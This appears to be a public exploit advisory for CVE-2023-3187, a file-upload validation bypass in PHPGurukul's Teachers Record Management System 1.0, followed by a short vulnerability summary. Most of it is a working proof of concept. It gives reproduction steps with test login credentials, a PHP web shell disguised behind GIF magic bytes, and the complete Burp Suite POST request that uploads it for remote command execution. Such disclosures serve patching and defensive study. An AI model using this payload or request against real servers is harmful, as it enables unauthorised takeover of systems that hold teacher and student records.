Headline
Teachers Record Management System 1.0 Validation Bypass
Teachers Record Management System version 1.0 suffers from file upload validation bypass vulnerability.
Exploit Title: Teachers Record Management System 1.0 – File Upload Type ValidationDate: 17-01-2023EXPLOIT-AUTHOR: AFFAN AHMEDVendor Homepage: <https://phpgurukul.com>Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>Version: 1.0Tested on: Windows 11 + XAMPPCVE : CVE-2023-3187===============================STEPS_TO_REPRODUCE===============================1. Login into Teacher-Account with the credentials “Username: [email protected]”Password: Test@123”2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image3. Open the Burp-suite and Intercept the Edit Image Request4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”5. Change the **Content-type from “ image/png “ to “ image/gif “6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**8. Below is the Burpsuite-POST Request for all the changes that I have made above==========================================BURPSUITE_REQUEST==========================================POST /trms/teacher/changeimage.php HTTP/1.1Host: localhostContent-Length: 442Cache-Control: max-age=0sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: <http://localhost>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: <http://localhost/trms/teacher/changeimage.php>Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qcConnection: close------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="subjects"John Doe------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"Content-Type: image/gifGIF89a <?php echo system($_REQUEST['dx']); ?>------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="submit"------WebKitFormBoundaryndAPYa0GGOxSUHdF--===============================PROOF_OF_CONCEPT===============================GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.mdRelated news
CVE-2023-3187: Vulnerability/trms.md at main · ctflearner/Vulnerability
A vulnerability, which was classified as critical, has been found in PHPGurukul Teachers Record Management System 1.0. Affected by this issue is some unknown functionality of the file /changeimage.php of the component Profile Picture Handler. The manipulation of the argument newpic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231176.